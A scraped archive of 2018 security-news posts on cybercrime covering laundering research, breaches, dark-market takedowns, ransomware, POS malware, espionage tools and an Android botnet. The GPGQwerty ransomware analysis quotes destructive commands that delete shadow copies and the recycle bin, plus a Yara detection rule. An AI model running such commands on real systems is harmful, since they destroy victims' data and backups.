Category Archives: Cybercrime

Cybercrime Profits Total Nearly $200 Billion Each Year, Study Reveals

Illegal cybercrime profits total as much as $200 billion each year, according to an academic study into cybercriminals’ money laundering schemes.

Virtualization-based security firm Bromium announced some of the findings from its nine-month “Into the Web of Profit” study into how cybercriminal launder money online. The report revealed that cybercrime funds make up between 8 and 10 percent of illegal profits laundered across the world. Those figures place global ill-gotten proceeds at $80 billion to $200 billion annually.

Digital Currencies Driving Cybercrime Profits

Virtual currencies have become the primary tools threat actors use to launder money. They could play an even bigger role in future illicit transactions. According to the study, cybercriminals are increasingly using digital money to purchase real estate, with cryptocurrencies expected to account for 25 percent of total property sales in the next few years.

Even so, law enforcement is more intent on monitoring bitcoin, which is driving cybercriminals to look for alternatives, the study found. Some bad actors could turn to Litecoin, the second-most popular cryptocurrency on the Dark Web. Others are expected to embrace in-game currency and goods from “Grand Theft Auto V,” “Minecraft” and other computer games.

The Cybercrime Economy

Dr. Mike McGuire, senior lecturer in criminology at Surrey University in England, conducted the study under Bromium’s sponsorship. His research revealed that cybercrime is more than just a business.

“It’s like an economy which mirrors the legitimate economy,” said McGuire, as quoted by Dark Reading. “The problem here is the cyber economy and the legitimate economy is so intertwined that some laundering is going on in cyber, then back to the real world, then back to cyber.”

McGuire will present further findings from “Into the Web of Profit” during his speaker slot at the RSA Conference 2018 in San Francisco on April 20.

The post Cybercrime Profits Total Nearly $200 Billion Each Year, Study Reveals appeared first on Security Intelligence.

Understanding email fraud: Do you have visibility into email threats?

82% of boards are concerned with email fraud, and 59% consider it a top security risk – no longer just an IT issue. Yet 30% of respondents to a survey conducted by Censuswide cited a lack of executive support as a key challenge to email fraud protection deployment, according to Proofpoint. “Email fraud is highly pervasive and deceptively simple; hackers don’t need to include attachments or URLs, emails are distributed in fewer volumes, and typically … More

The post Understanding email fraud: Do you have visibility into email threats? appeared first on Help Net Security.

A look inside the big business of cybercrime

For three months, Armor’s Threat Resistance Unit (TRU) research team compiled and analyzed data from the black market to shed light on the type of activity threat actors are participating in and how underground forums operate in the burgeoning industry. Just as big businesses operate based on regulations, the laws of supply and demand, and even customer reviews, so does the black market. However, unlike the legitimate economy, the underground market is highly anonymized and … More

The post A look inside the big business of cybercrime appeared first on Help Net Security.

Frost Bank announced it has suffered a data breach that exposed check images

On Friday, Frost Bank announced that it has suffered a data breach that exposed check images, crooks could use them to forge checks.

Frost Bank announced on Friday that it has suffered a data breach that exposed check images.

The bank is a subsidiary of Cullen/Frost Bankers, Inc., its staff discovered an unauthorized access to its systems containing images of checks.

Attackers compromised a third-party lockbox software program, in this way they were able to access the images of checks stored electronically in the database.

“In March 2018, Frost detected unauthorized access into a third-party lockbox software program that allowed unauthorized users to view and copy images of checks stored electronically in the image archive.” reads the security advisory published by the company.

“The identified incident did not impact other Frost systems. We have stopped the unauthorized access, and have reported the incident to and are cooperating with law-enforcement authorities.”

The lockbox services are normally used by customers to send payments to a central post office box, once the bank will receive the payments it will credit them to a business’s account.

According to Frost Bank, its systems weren’t impacted by the security breach.

The bad news is that crooks once obtained the images could use them to forge checks.

“Information from the accessed images can be used to forge checks.” continues the advisory.

Frost Bank

According to Frost Bank, the unauthorized access was limited to one software program serving about 470 commercial customers who use the electronic lockbox,

The company confirmed it stopped the identified unauthorized access once discovered the breach.

Law enforcement is investigating the case, while Frost Bank hired an unnamed cybersecurity firm to investigate the security breach,

“At Frost, we care deeply about taking care of our customers and protecting their information, and we regret that this situation has occurred. We are working very hard to make things right,” Frost Chairman and CEO Phil Green said in a statement.


Pierluigi Paganini

(Security Affairs – Frost Bank, data breach)

The post Frost Bank announced it has suffered a data breach that exposed check images appeared first on Security Affairs.

SecurityWeek RSS Feed: Coverity Scan Hacked, Abused for Cryptocurrency Mining

Coverity Scan, a free service used by tens of thousands of developers to find and fix bugs in their open source projects, was suspended in February after hackers breached some of its servers and abused them for cryptocurrency mining.

Synopsys, which acquired Coverity in 2014, started notifying Coverity Scan users about the breach on Friday. The company said malicious actors gained access to Coverity Scan systems sometime in February.

“We suspect that the access was to utilize our computing power for cryptocurrency mining,” Synopsys told users. “We have not found evidence that database files or artifacts uploaded by the open source community users of the Coverity Scan service were accessed. We retained a well-known computer forensics company to assist us in our investigation.”

Synopsys says the service is now back online and it believes the point of access leveraged by the attackers has been closed. In order to regain access to Coverity Scan, users will need to reset their passwords.

“Please note that the servers in question were not connected to any other Synopsys computer networks. This should have no impact on customers of our commercial products, and this event did not put any Synopsys corporate data or intellectual property at risk,” users were told.

Cybercriminals have become increasingly interested in making a profit by hacking PCs and servers and abusing them to mine cryptocurrencies. Cryptocurrency mining malware can target a wide range of devices, including industrial systems.

One recent high-profile victim was the carmaker Tesla, whose Kubernetes pods were compromised and used for cryptocurrency mining. According to RedLock, which discovered the breach, hackers gained access to Tesla’s Kubernetes console due to the lack of password protection.

Related: Avoid Becoming a Crypto-Mining Bot - Where to Look for Mining Malware and How to Respond

Related: Linux Malware Targets Raspberry Pi for Cryptocurrency Mining

view counter
Eduard Kovacs is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

SecurityWeek RSS Feed

Coverity Scan Hacked, Abused for Cryptocurrency Mining

Coverity Scan, a free service used by tens of thousands of developers to find and fix bugs in their open source projects, was suspended in February after hackers breached some of its servers and abused them for cryptocurrency mining.

Synopsys, which acquired Coverity in 2014, started notifying Coverity Scan users about the breach on Friday. The company said malicious actors gained access to Coverity Scan systems sometime in February.

“We suspect that the access was to utilize our computing power for cryptocurrency mining,” Synopsys told users. “We have not found evidence that database files or artifacts uploaded by the open source community users of the Coverity Scan service were accessed. We retained a well-known computer forensics company to assist us in our investigation.”

Synopsys says the service is now back online and it believes the point of access leveraged by the attackers has been closed. In order to regain access to Coverity Scan, users will need to reset their passwords.

“Please note that the servers in question were not connected to any other Synopsys computer networks. This should have no impact on customers of our commercial products, and this event did not put any Synopsys corporate data or intellectual property at risk,” users were told.

Cybercriminals have become increasingly interested in making a profit by hacking PCs and servers and abusing them to mine cryptocurrencies. Cryptocurrency mining malware can target a wide range of devices, including industrial systems.

One recent high-profile victim was the carmaker Tesla, whose Kubernetes pods were compromised and used for cryptocurrency mining. According to RedLock, which discovered the breach, hackers gained access to Tesla’s Kubernetes console due to the lack of password protection.

Related: Avoid Becoming a Crypto-Mining Bot - Where to Look for Mining Malware and How to Respond

Related: Linux Malware Targets Raspberry Pi for Cryptocurrency Mining

view counter
Eduard Kovacs is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Ransomware Takes Open-Source Path, Encrypts With GNU Privacy Guard

McAfee Labs has recently observed a new variant of ransomware that relies on the open-source program GNU Privacy Guard (GnuPG) to encrypt data. GnuPG is a hybrid-encryption software program that uses a combination of conventional symmetric-key cryptography for speed and public-key cryptography to ease the secure key exchange. Although ransomware using GnuPG to encrypt files is not unique, it is uncommon.

We analyzed the following SHA-256 hashes of the malware GPGQwerty:

  • 2762a7eadb782d8a404ad033144954384be3ed11e9714c468c99f0d3df644ef5
  • 39c510bc504a647ef8fa1da8ad3a34755a762f1be48e200b9ae558a41841e502
  • f5cd435ea9a1c9b7ec374ccbd08cc6c4ea866bcdc438ea8f1523251966c6e88b

We found these hashes need many support files for successful execution. The three files themselves will not encrypt anything. GPGQwerty consists of a bundle of files that runs together to encrypt a victim’s machine. The bundle comprises ten files:

This ransomware was first seen at the beginning of March. Generally, this type of malware spreads by spam email, malicious attachments, exploits, or fraudulent downloads. The binary 39c510bc504a647ef8fa1da8ad3a34755a762f1be48e200b9ae558a41841e502 was spotted in the wild at hxxp://; it may be part of a drive-by download strategy or was hosted on a legitimate site.

Key.bat, run.js, and find.exe are three files that play a vital role in the encryption process. The infection process follows this path:


The binary find.exe has eight sections and the raw size of its .bss section is zero.

It also has an unusual time and date stamp:

The file includes malicious thread local storage (TLS) callbacks as an anti-analysis trick. Generally, this technique allows executable files to include malicious TLS callback functions to run prior to the AddressOfEntryPoint field (the normal execution point of a binary) in the executable header.

The action starts with the execution of the batch file key.bat. It imports the key and launches find.exe on the victim’s machine by executing the JavaScript run.js. The contents of the batch and JavaScript files are shown in the following snippet:

This ransomware kills some selected running tasks using command-line utility taskkill. This command has options to kill a task or process either by using the process ID or the image filename. In the following snippet, we see it terminating some processes forcefully by using their image names.

The ransomware tries to encrypt data using GnuPG (gpg.exe). The malware appends the extension .qwerty to the encrypted files:

The malware overwrites the original files using shred.exe:

After encryption, the ransomware allots a unique ID that identifies each victim. It also creates a .txt file that states all files on the computer have been locked and the victim must pay to decrypt the files.

GPGQwerty deletes the recycle bin using the Windows utility del:

Using the command “vssadmin.exe Delete Shadows /All /Quiet,” the ransomware silently removes the volume shadow copies (vssadmin.exe, wmic.exe) from the target’s system, thus preventing the victim from restoring the encrypted files. It also deletes backup catalogs (wbadmin.exe) and disables automatic repair at boot time (bcdedit.exe):

Finally, it creates the ransom note readme_decrypt.txt in each folder that holds an encrypted file. The ransom note gives instructions to communicate with an email address within 72 hours to arrange payment.

This Yara rule detects GPGQwerty:

rule crime_ransomware_windows_GPGQwerty: crime_ransomware_windows_GPGQwerty



author = “McAfee Labs”

description = “Detect GPGQwerty ransomware”


$a = “gpg.exe –recipient qwerty  -o”

$b = “%s%s.%d.qwerty”

$c = “del /Q /F /S %s$recycle.bin”

$d = “”


          all of them



McAfee advises all users to keep their antimalware products up to date. McAfee products detect this malware as Ransomware-GKF! [Partial hash] with DAT Versions 8826 and later. For more on combatin

The post Ransomware Takes Open-Source Path, Encrypts With GNU Privacy Guard appeared first on McAfee Blogs.

The Ripple Effect of the Hansa Takedown

For nearly a decade we have witnessed the systemic rise and fall “dark net” markets. Each time a site is taken down by law enforcement, we see other, opportunistic ones capitalize on buyers looking for new places to purchase illegal goods. Last year we explored the takedowns of the popular black markets AlphaBay and Hansa and saw a noticeable hesitation. Something about these takedowns had an impact, if even short term, among buyers and sellers on dark net markets. After examining the flow of crime across the dark web following these two sites under siege, we have found that these takedowns had noticeable impact.

AlphaBay was a massive marketplace and has been the top market since the year following the Silk Road takedown. Once AlphaBay was stopped last year, we began tracking cybercriminal response and saw the migration to smaller markets, including Hansa, which had an influx of of new vendors and buyers shortly after AlphaBay disappeared. This is similar behavior to what we saw after the Silk Road takedown. Orphaned users needed a new home and migrated to newer markets such as Dark Market Reloaded, Evolution, Silk Road 2.0, and eventually AlphaBay. Some of these turned out to be scams—as seen with Evolution—or were subject to law enforcement takedowns—as was the case with Silk Road 2.0 with Operation Onymous. Dark net markets are no strangers to risk.

Although AlphaBay was a large takedown, it had a similar impact to many dark net market exits before it. However, the follow-up Hansa takedown was an unexpected blow and likely a heavy psychological hit. Criminals predictably flocked to several other markets, including Hansa. Law enforcement was ready for them as they had hijacked the two administrators’ accounts, migrated the market to a different infrastructure and got full control of Hansa for almost a month over the course of the operation. During this period, law enforcement successfully worked on a trap that undermined the trust of a lot of buyers and sellers. Criminals were unaware, migrating from market to market and assuming they were untouchable in a game of wack-a-mole. They were proven wrong. By using a variety of methods, the law enforcement agencies involved identified a large portion of vendors and buyers, disrupting both confidence and trust.

After it was publicly announced that Hansa was under the control of law enforcement, panic started to spread in the dark net market community and on social media. Even vendors on other markets were no longer trusted. Reports on Reddit came out that their PGP keys were somehow changed, creating much confusion. In the eyes of the paranoid, everyone was compromised. In spite the increased distrust, many markets survived, including one of the largest dark markets today, Dream Market. However, migration to these markets was slow. The seemingly business-as-usual takedown of AlphaBay, followed up by the complete takeover of Hansa, had made its mark.

Dark markets continue to grow and survive. As long as the profitability of dark net markets is viable, they will continue to emerge. Stolen digital data, which drives much of the profits, will continue to be a key motivator. As long as there is a market, we must secure our data. This effort starts by being diligent about protecting our assets.

There are a few key ways to reduce risk. For businesses and individuals, this includes maintaining proper procedures and practices that ensure good security hygiene. Never share data unless the requester is trusted and sharing is absolutely necessary. And always use a security infrastructure that safeguards the data centers or cloud storage your organization uses to collect and store crucial data.

To learn more about our fight against cybercrime, be sure to follow us at @McAfee and @McAfee_Labs.

The post The Ripple Effect of the Hansa Takedown appeared first on McAfee Blogs.

A week in security (March 12 – March 18)

Last week on Malwarebytes Labs, we took a look at the inner workings of a fileless attack, explored what happened in a zero day ransomware attack aimed at South Koreans, gave you hints and tips for avoiding cold calls, and took a deep dive into the secretive world of GrayKey.

Other news

Stay safe, everyone!

The post A week in security (March 12 – March 18) appeared first on Malwarebytes Labs.

The Book : Digging the Deep Web: Exploring the dark side of the web

My new book, titled ‘Digging the Deep Web: Exploring the dark side of the web’ is available online, enjoy it.

It’s a pleasure and an honor for me to announce the availability of my book

Digging the Deep Web: Exploring the dark side of the web

Kindle Edition — Paper Copy

Digging The Deep Web

What is the Deep Web and what are darknets? The book provides a detailed overview of the cybercriminal underground in the hidden part of the web.
The book details the criminal activities associated with threat actors, detailing their techniques, tactics, and procedures. 

The Dark Web is considered the reign of crooks and cyberspies, it is a privileged environment for hackers, but also the scammers’ paradise.

Cyber terrorists, hackers, cyber criminals and intelligence agencies crowd this portion of the web and the book explains how these actors interact and which is their modus operandi.

Enjoy the book:

Kindle Edition

Paper Copy


Pierluigi Paganini

(Security Affairs – cybercrime, Dark Web)

The post The Book : Digging the Deep Web: Exploring the dark side of the web appeared first on Security Affairs.

Cyber Criminals Launder Billions with Bitcoin, In-game Loot

Cyber criminals are laundering billions of ill-gotten gain using crypto currencies like Bitcoin and Monero and in-game currencies for popular online games like World of Warcraft, FIFA Soccer and Grand Theft Auto.  Research sponsored by the security firm Bromium and conducted by researchers at Surrey University in England found that cyber...

Read the whole entry... »

Related Stories

7 Digital Safety Tips for Teens Filing Their First Tax Returns

Landing that first part-time job in high school and filing your first tax return is a rite of passage for a young person. So why am I so anxious about my daughter becoming a taxpayer and sharing her pristine personal data with the U.S. government?

Where do I begin? The fact is, the more widely her personal information travels, the more digital risks she faces. Adding to my angst is my own experience with identity theft over a decade ago that still haunts me and is the last stress I’d wish upon my child or anyone else’s.

So as my daughter waves her W-2 at me and elatedly chatters about how she’s going to spend her refund, I — like so many other parents across the country — put on my coach’s hat for a key talk around the digital risks that come with tax season.

7 Tax Filing Safety Tips for Families

  1. Allow your child to file. Sometimes it’s easier just to file a 1040-EZ form for your child and be done with it. The wiser route is to take the time to teach your child the few steps needed to file correctly and the legal reasons we all must pay taxes. Part of this discussion is going over the digital risks of tax season such as identity theft, malware and viruses, tax fraud, and identity theft.
  2. Discuss the power of a SSN. Talk about the responsibility and power of owning a Social Security Number (SSN) and why it must be safeguarded. A SSN is the most critical piece of government-issued identification an American citizen can possess. It is tied to personal credit, identification, and is the primary way the way the government tracks earnings of an individual during his or her lifetime. The SSN is the golden ticket for cyber thieves who make a career of stealing and selling social security numbers and identities online.
  3. Secure all digital doorways. One of the ways cyber thieves gain access to personal information is through hacking, and the best way to slam that door is by creating strong passwords. Easy passwords are the #1 way hackers unlock our data. Tax time is a perfect opportunity to challenge your child to create stronger passwords for all of his or her devices and email accounts. At the same time you upgrade password security, make sure updates on software, PCs, phones, and web browsers are current to protect your devices against viruses and malware that can grab login information.
  4. File early. Start the habit of early filing. The sooner you file your tax return and teach your child to do the same, the more you lessen the chance of a thief using yours or your child’s identity to claim a refund before your return goes through. According to the Identity Theft Resource Center, tax return fraud is on the rise due to more significant security breaches and the number of identities now for sale online.
  5. Be overly cautious every step of the way. Use a reputable firm or company to handle yours and your child’s tax return. Legitimate tax preparers must sign all forms with their IRS preparer identification number. If you end up filing the 1040-EZ form on paper, be sure to hand deliver your returns to the post office mailbox. Thieves target March and April as prime for stealing tax information from curbside, residential mailboxes. Filing online? That’s fine if you make sure you do so over secured wifi. The local coffee shop or library isn’t going to protect your tax information from unscrupulous, prying eyes. Look for the HTTPS web designation at the front of the Internal Revenue System’s web address before submitting your documents.
  6. File a fraud alert. Because your child has rarely used his or her social security number, set up a fraud alert. By submitting a fraud alert in your child’s name with the three main credit bureaus several times a year, you will be able to catch any credit fraud early. Since your child hasn’t built any credit, anything that comes back will be illegal activity. The fraud alert will remain in place for only 90 days. When the time runs out, you’ll need to reactivate the alert. You can achieve the same thing by filing an earnings report from the Social Security Administration. The report will reveal any earnings acquired under your child’s social security number.
  7. Celebrate. Tax time tends to bring out the anxiety in just about everyone. Change that mentality with your child if possible. Make tax time rewarding. Go out for a celebration dinner or dessert. Congratulate him or her on filing safely and responsibly. And, don’t forget to recognize the even bigger accomplishment of stepping into the workforce and taking on the challenge of a first job.

This post is the first of a two-part series focused on digital safety during tax season. Next week, we will highlight some of the scams thieves use and how to safeguard your family.

toni page birdsong



Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post 7 Digital Safety Tips for Teens Filing Their First Tax Returns appeared first on McAfee Blogs.

China-linked Hackers Target Engineering and Maritime Industries

A China-related cyberespionage group that has been active for half a decade has increased its attacks on engineering and maritime entities over the past months, FireEye reports.

Referred to as Leviathan or TEMP.Periscope, the group has been historically interested in targets connected to South China Sea issues, which hasn't changed in the recently observed attacks. Targets include research institutes, academic organizations, and private firms in the United States.

“The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit,” FireEye says.

Over the years, the group has also shown interest in professional/consulting services, high-tech industry, healthcare, and media/publishing. Most of the identified victims were in the United States, with some located in Europe and at least one in Hong Kong.

The group’s tactics, techniques, and procedures (TTPs), as well as its targets, overlap with those associated with the group called TEMP.Jumper, which in turn overlaps significantly with the NanHaiShu group.

The recently observed spike in activity also revealed the use of a broad range of malware that other suspected Chinese groups also use. These tools include backdoors, reconnaissance tools, file stealers, and webshells.

The first of the backdoors is Airbreak, a JavaScript-based tool that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.

A second backdoor is Badflick, which can modify the file system, generate a reverse shell, and modify its command and control (C&C) configuration.

Another similar piece of malware is Photo, a DLL backdoor that gets directory, file, and drive listing; creates a reverse shell; records the screen, video, and audio; lists, terminates, and creates processes; creates and modifies registry keys and values; logs keystrokes, returns usernames and passwords from protected storage; and can read, create, and modify files.

The group also used Homefry, a 64-bit Windows password dumper/cracker previously used along with the first two backdoors. Based on received commands, it can either display cleartext credentials for each login session, or can display cleartext credentials, NTLM hashes, and malware version for each login session.

Other tools employed by the hackers include Lunchmoney (which can exfiltrate files to Dropbox) and Murkytop, a command-line reconnaissance tool (which can execute files; move and delete files; schedule remote AT jobs; perform host discovery; scan for open ports in a connected network; and retrieve information about the operating system, users, groups, and shares on remote hosts).

In recent attacks, the group was also observed employing the China Chopper code injection webshell capable of executing Microsoft .NET code within HTTP POST commands (thus, it can upload and download files, execute applications, list directory contents, access Active Directory, access databases, and more).

Previously, the group used the Beacon backdoor (commercially available as part of the Cobalt Strike software platform), and the Blackcoffee backdoor that hides C&C communication as traffic to legitimate websites such as Github and Microsoft's Technet portal.

The group has been also observed using spear phishing emails; lure documents attempting to exploit CVE-2017-11882 to drop malware; stolen code signing certificates to sign their malware; bitsadmin.exe and PowerShell to download additional tools; and Windows Management Instrumentation (WMI) and Windows Shortcut files (.lnk) for persistence.

“The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations,” FireEye concludes.

Related: Cyber Espionage Targets Interests in South China Sea

view counter

PinkKite POS Malware Is Small but Powerful

A newly discovered piece of malware targeting point-of-sale (POS) systems has a very small size but can do a lot on the infected systems, security researchers reveal.

Called PinkKite, the POS malware was observed last year as part of a large campaign that ended in December, but was only detailed last week at Kaspersky Lab’s Security Analyst Summit (SAS). Discovered by researchers at Kroll Cyber Security, the malware is believed to have appeared last year for the first time.

Similar to previously observed POS malware families such as TinyPOS and AbaddonPOS, the new PinkKite has a very small size (it is less than 6kb) and uses its tiny footprint to evade detection. Despite this, however, the malware includes memory-scraping and data validation capabilities.

Furthermore, Courtney Dayter and Matt Bromiley, who detailed the threat at last week’s SAS 2018, reveal that PinkKite uses a hardcoded double-XOR cipher to encrypt credit card numbers. It also features built-in persistence mechanisms, and a backend infrastructure that leverages a clearinghouse to exfiltrate data to (POS malware typically sends data to the command and control (C&C) server).

In fact, the PinkKite operators used three clearinghouses (or depots) that the malware sent data to in the observed campaign. These were located in South Korea, Canada and the Netherlands, the researchers revealed.

The use of clearinghouses likely made the data collection easier and allowed operators to distance themselves from the terminals, but it also made the operation very noisy.

For distribution purposes, the attackers likely infected a system and then moved laterally across the targeted company’s network environment using PsExec. Next, the hackers used Mimikatz to extract credentials from the Local Security Authority Subsystem Service (LSASS), and then connected to the compromised systems to steal credit card data via a Remote Desktop Protocol (RDP) session.

The PinkKite executable, the researchers discovered, attempts to pass as a legitimate Windows program and uses names such as Svchost.exe, Ctfmon.exe and AG.exe for that. Different versions of the malware exist, including a whitelist variant that specifically targets processes in a list, and a blacklist iteration that instead ignores certain processes.

After scrapping credit card data from the system memory, PinkKite validates card numbers using a Luhn algorithm. It also employs a double-XOR operation to encode the 16 digits of the credit card number with a predefined key, and stores the data in compressed files that can hold as many as 7,000 credit card numbers each.

Using a separate RDP session, the files are sent to one of the employed clearinghouses. These remote systems collected hundreds or thousands of malware output files, the researchers discovered.

The attackers were stealthy enough to stay under the radar until the targeted organization was alerted on its customers’ credit card data being sold on the black market.

Travis Smith, principal security researcher at Tripwire, told SecurityWeek in an email that, even if this powerful malware family has a little footprint, its size has nothing to do with how it can be detected.

“A change on a static endpoint like a point-of-sale machine will stick out clearly with the proper controls. Application white listing is a quick and very effective way to prevent malware such as PinkKite from being allowed to run on a point-of-sale machine. However, if the adversaries were able to use Mimikatz to steal admin credentials, they could bypass controls such as the built in AppLocker available from Windows. Having layered controls which are designed for both mitigation and detection are key in a successful security architecture,” Smith said.

He also pointed out that the malware’s small size forced it to rely heavily on network communication, which can be prevented and detected.

“Since point-of-sale networks are also fairly static, any communication outside of an established baseline can be considered malicious until proven benign. Utilizing a whitelist set of firewall rules on the point-of-sale network will limit the malware from sending stolen credit cards to adversaries around the world,” Smith concluded.

Related: New PoS Malware Family Discovered

Related: POS Malware Abuses Exposed ElasticSearch Nodes for C&C

Cybercriminals launder money through mansions, private islands and crypto currency

Cybercriminal proceeds make up an estimated 8-10 percent of total illegal profits laundered globally, amounting to an estimated $80-$200 billion each year, according to a nine-month academic study by Dr. Mike McGuire, Senior Lecturer in Criminology at Surrey University. Key research findings Virtual currencies have become the primary tool used by cybercriminals for money laundering Cybercriminals are moving away from Bitcoin to less recognized virtual currencies, like Monero, that provide greater anonymity In-game purchases and … More

The post Cybercriminals launder money through mansions, private islands and crypto currency appeared first on Help Net Security.

The RottenSys botnet is already composed of nearly 5 million Android devices

RottenSys – A Chinese crime ring is building a huge botnet that is already composed of nearly 5 million Android device.

Researchers at Check Point discovered attackers infecting the device with a strain of malware dubbed RottenSys that aggressively display ads on victims’ devices.

“The Check Point Mobile Security Team has discovered a new widespread malware family targeting nearly 5 million users for fraudulent ad-revenues. They have named it ‘RottenSys’ for in the sample we encountered it was initially disguised as a System Wi-Fi service.” reads the analysis of Check Point.

The experts started the investigation after finding an unusual self-proclaimed system Wi-Fi service (系统WIFI服务) on a Xiaomi Redmi phone. The researchers discovered the service does not provide any secure Wi-Fi, instead, it asks for many Android permissions.

The RottenSys malware implements two evasion techniques:

  • The first technique consists of postponing operations for a set time.
  • The second technique uses a dropper which does not display any malicious activity at first. Once the device is active and the dropper contacts the Command and Control (C&C) server which sends it a list of additional components required for its activity.

The malicious code relies on two open-source projects:

  • The Small  virtualization framework. RottenSys uses Small to create virtualized containers for its components, with this trick the malware could run parallel tasks, overwhelming Android OS limitations.
  • The MarsDaemon library that keeps apps “undead.” MarsDaemon is used to keep processes alive, even after users close them. Using it the malware is always able to inject ad.

According to the experts, the botnet will have extensive capabilities including silently installing additional apps and UI automation, there is the risk that crooks will use it to carry on more dangerous activities such as ransomware distribution.

“This botnet will have extensive capabilities including silently installing additional apps and UI automation. Interestingly, a part of the controlling mechanism of the botnet is implemented in Lua scripts. Without intervention, the attackers could re-use their existing malware distribution channel and soon grasp control over millions of devices.” continues the analysis.

The RottenSys malware was first spotted in September 2016, the number of victims grew across the time, today the number of infected systems is 4,964,460.

At the time, the malicious code only targets the Chinese users, it is bundled in Chinese apps and it is infecting mostly phones mobile devices, such as Huawei, Xiaomi, OPPO, vivo, LeEco, and Coolpad.

RottenSys chart 2.png

Attackers are financially motivated, according to Check Point botnet operators are currently making around $115,000 every ten days. The experts calculated the revenue from these impressions and clicks according to the conservative estimation of 20 cents for each click and 40 cents for every thousand impressions.

Further info is included in the report published by Check Point.

Pierluigi Paganini

(Security Affairs – RottenSys, botnet)

The post The RottenSys botnet is already composed of nearly 5 million Android devices appeared first on Security Affairs.

Microsoft Publishes Bi-annual Security Intelligence Report (SIR)

Microsoft's 23rd bi-annual Security Intelligence Report (SIR) focuses on three topics: the disruption of the Gamarue (aka Andromeda) botnet, evolving hacker methodologies, and ransomware. It draws on the data analysis of Microsoft's global estate since February 2017, including 400 billion email messages scanned, 450 billion authentications, and 18+ billion Bing webpage scans every month; together with the telemetry collected from the 1.2 billion Windows devices that opt in to sharing threat data with Microsoft.

It is worth noting that Microsoft applies machine learning (ML) artificial intelligence to this data to tune its own security software. Since the efficiency of ML-based endpoint protection relies on both the algorithms employed, and the size of the data pool from which it learns, the implication is that Windows Defender has the potential to become an increasingly effective protection tool.


Gamarue was one of the largest botnets in the world. From 2011 it had evolved through five active versions and had been involved in distributing Petya and Cerber ransomware, Kasidet (aka the Neutrino bot), the Lethic spam bot, and data stealing malware such as Ursnif, Carberp and Fareit.

In partnership with ESET, Microsoft had been researching the Gamarue infrastructure and 44,000 associated malware samples, since December 2015. Details on 1,214 C&C domains and IPs, 464 distinct botnets and more than 80 malware families were collected and handed to law enforcement agencies around the world. On November 29, 2017, Gamarue's C&C servers were disconnected and replaced with a sinkhole.

Since the disruption, the sinkhole has collected the IP addresses of 23 million infected devices. Microsoft has watched the number of Gamarue-infected devices reduce month by month, from around 17 million in December 2017 to 14 million in January 2018, and less than 12 million in February. Johnnie Konstantas, senior director with the Microsoft Cybersecurity Enterprise Group, told SecurityWeek, "The team reached out to ISPs, law enforcement agencies and identified companies, and told them about the infected IPs. Those organizations could identify the individual infected devices and organize the mitigations -- which is what reduces the number of infected devices still connecting to the sink-hole." Microsoft does not use the botnet to directly warn the infected users; but ESET comments, "at least no new harm can be done to those compromised PCs."

Hacker routes

Over the last few years -- not least because of the introduction of machine learning techniques -- security protections have improved, and direct hacking has become more difficult and time-consuming. While still employed by well-resourced actors -- such as nation-state affiliated groups -- hackers in general have diverted their attention to the 'low-hanging fruit'. The SIR describes three of these routes: social engineering, poorly-secured cloud apps, and the abuse of legitimate software platform features.

Social engineering attacks are largely synonymous with phishing attacks. The SIR notes "a significant volume of phishing-based email messages at the very end of the year 2017. Phishing was the #1 threat vector (> 50%) for Office 365-based email threats in the second half of calendar year 2017." There are various tools available to help detect phishing, but some academics doubt that even machine learning techniques will be unable to solve the problem. 

Microsoft stresses the value of user awareness training. While users are often called 'the weakest link', they are also the first line of defense. Every well-trained user is effectively an individual human firewall.

The second of the low-hanging fruits is poorly secured cloud apps. "We studied about 30 of them," said Konstantas, "looking at the security measures they employed. First you want header security, to prevent attacks like cookie poisoning or cross-site scripting that take over the session. Then you also want encryption of data in motion between the end device and the cloud, and finally encryption of data at rest."

Microsoft found that about 79% of storage apps, and 86% of collaboration apps did not have all three measures. "They may have had one or two of the three," she continued, "but not all three. This is a big deal, because you're talking about potentially valuable corporate data accessible to adversaries, and also the possibility of malware infection coming back to the device." 

The problem is intensified by shadow IT -- companies may not even be aware that staff are using these insecure apps. "Mitigation here," she said, "is focused on cloud access security brokers (CASBs) that can apply all three security measures to traffic going to the cloud, can monitor what is going on in the cloud, and can identify what unsanctioned cloud apps are being used by staff."

The third of the low-hanging fruits is the abuse of legitimate services. The SIR gives just one example: the exploitation of DDE in October and November 2017. In one quoted example, an attached Word document was able, through DDE, to download and run malicious payloads such as the Locky ransomware. 

Surprisingly, however, there is no mention of the abuse of PowerShell. PowerShell, activated from within weaponized Office attachments, is increasingly used by hackers to deliver 'fileless' attacks. McAfee's Q4 2017 Threat Report -- also published this week -- reports, "In 2017, McAfee Labs saw PowerShell malware grow by 267% in Q4, and by 432% year over year, as the threat category increasingly became a go-to toolbox for cybercriminals. The scripting language was irresistible, as attackers sought to use it within Microsoft Office files to execute the first stage of attacks." Operation Gold Dragon, in December 2017, is an example of the use of PowerShell by hackers.


Ransomware is, not surprisingly, the third major topic discussed in SIR 23. Last year will always be remembered as the year of three particular global ransomware outbreaks: WannaCry, NotPetya and Bad Rabbit. The first two of these rapidly became global in extent using an exploit known as EternalBlue; an NSA 'weapon' stolen and publicly released by the Shadow Brokers.

One of the disturbing aspects of these outbreaks is that Microsoft had already patched the vulnerability used by EternalBlue to spread from machine to machine. Konstantas confirmed to SecurityWeek that the first Microsoft knew about the EternalBlue exploit used in WannaCry was when it was released by Shadow Brokers; that is, Microsoft was not informed by the NSA that this exploit had been stolen by Shadow Brokers prior to it entering the public domain. This demonstrates both the speed with which Microsoft handles serious vulnerabilities, and the slowness with which large numbers of users take advantage of available patches. Azure customers were automatically protected, confirmed Konstantas.

According to the SIR, the three most commonly encountered ransomwares in 2017 were Android LockScreen, WannaCry and Cerber. LockScreen is interesting since it is Android malware that crosses to Windows devices when users sync their phones or download Android apps, usually side loading from outside of the Google Play store, via Windows.

